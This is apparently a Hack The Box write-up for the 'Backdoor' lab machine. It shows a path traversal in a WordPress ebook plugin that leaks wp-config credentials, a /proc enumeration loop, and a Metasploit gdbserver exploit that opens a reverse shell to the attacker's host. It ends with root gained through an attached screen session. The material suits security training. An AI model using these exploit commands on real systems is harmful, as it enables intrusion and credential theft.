Backdoor - [HTB]

Cover Image for Backdoor - [HTB]
Marmeus
Marmeus

Introduction

Backdoor is a Linux machine where the attacker will have to find executed commands through an LFI on a WordPress plugin. Finally, for becoming root will have to attach to a screen terminal as root.

Enumeration

As always, let's start finding all opened ports in the machine with Nmap.

kali@kali:~/Documents/HTB/backdoor$ sudo nmap -v -sS -p- -n -T5 -oN AllPorts.txt 10.10.11.125
Warning: 10.10.11.125 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.125
Host is up (0.18s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste

Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Nov 22 12:27:33 2021 -- 1 IP address (1 host up) scanned in 371.30 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/backdoor$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,1337 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.18s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking for domains on the web page we can find the backdoor.htb.

kali@kali:~/Documents/HTB/backdoor$ curl http://10.10.11.125/ | grep --color .htb
[...]
u-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="http://backdoor.htb/">Home</a></li> 
backdoor.htb

Enumerating WordPress with WpScan we can find an installed plugin.

kali@kali:~/Documents/HTB/backdoor$ wpscan --url http://backdoor.htb/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
[...]
[+] ebook-download
 | Location: http://www.backdoor.htb/wp-content/plugins/ebook-download/
 | Last Updated: 2020-03-12T12:52:00.000Z
 | Readme: http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/, status: 200
 |
 | Version: 1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
[...]

Exploitation

The Ebook plugin has an associated vulnerability on exploit-db, which can be exploited with the following command:

kali@kali:~/Documents/HTB/backdoor$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
[...]
/** MySQL database username */                                                 
define( 'DB_USER', 'wordpressuser' );                                          
                                                                               
/** MySQL database password */                                                 
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
[...]

Exploitation 2

Because port 1337 is very common in CTFs, maybe there is a custom binary listening on this port.

In order to find the executed command, we can take advantage of the path traversal vulnerability iterating over the /proc/ folder.

After waiting for some time, we can see that gdbserver has a listening port on 1337.

kali@kali:~/Documents/HTB/backdoor$ for i in {1..10000}; do echo $i; curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline 2>/dev/null | grep -v window.close ; done

[...]
/proc/957/cmdline/proc/957/cmdline/proc/957/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>w
indow.close()</script>958
/proc/958/cmdline/proc/958/cmdline/proc/958/cmdline<script>window.close()</script>959                              
/proc/959/cmdline/proc/959/cmdline/proc/959/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>win
dow.close()</script>960

In Metasploit, there is an associated module for the gdbserver which allows us to obtain a reverse shell as "user".

msf6 > use multi/gdb/gdb_server_exec
msf6 exploit(multi/gdb/gdb_server_exec) > options

Module options (exploit/multi/gdb/gdb_server_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
   RHOSTS    backdoor.htb     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     1337             yes       The target port (TCP)


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.15.118     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   x86_64 (64-bit)
msf6 exploit(multi/gdb/gdb_server_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.118:4444 
[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
[*] 10.10.11.125:1337 - Stepping program to find PC...
[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.10.11.125:1337 - Executing the payload...
[*] Command shell session 6 opened (10.10.15.118:4444 -> 10.10.11.125:35586 ) at 2021-11-22 14:22:35 -0500

id 
uid=1000(user) gid=1000(user) groups=1000(user)

Privilege Escalation

Enumerating with linpeas we can see that the root user is executing an infinite loop with a screen session.

[...]
root         957  0.0  0.0   2608  1756 ?        Ss   11:19   0:14      _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -d mS root ;; done
[...]

In order to access the active root screen, we need to execute the following command, which attaches to the current root session named "root".

screen -x root/root 
Must be connected to a terminal.

However, we need to be in a proper terminal to execute the screen command, so we need to execute the following commands, becoming root.

$ python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:/home/user$ screen -x root
screen -x root
Please set a terminal type.
user@Backdoor:/home/user$ export TERM=xterm
export TERM=xterm
user@Backdoor:/home/user$ screen -x root
screen -x root
There is no screen to be attached matching root.
user@Backdoor:/home/user$ screen -x root/root

root@Backdoor:~# cat /root/root.txt
[CENSORED]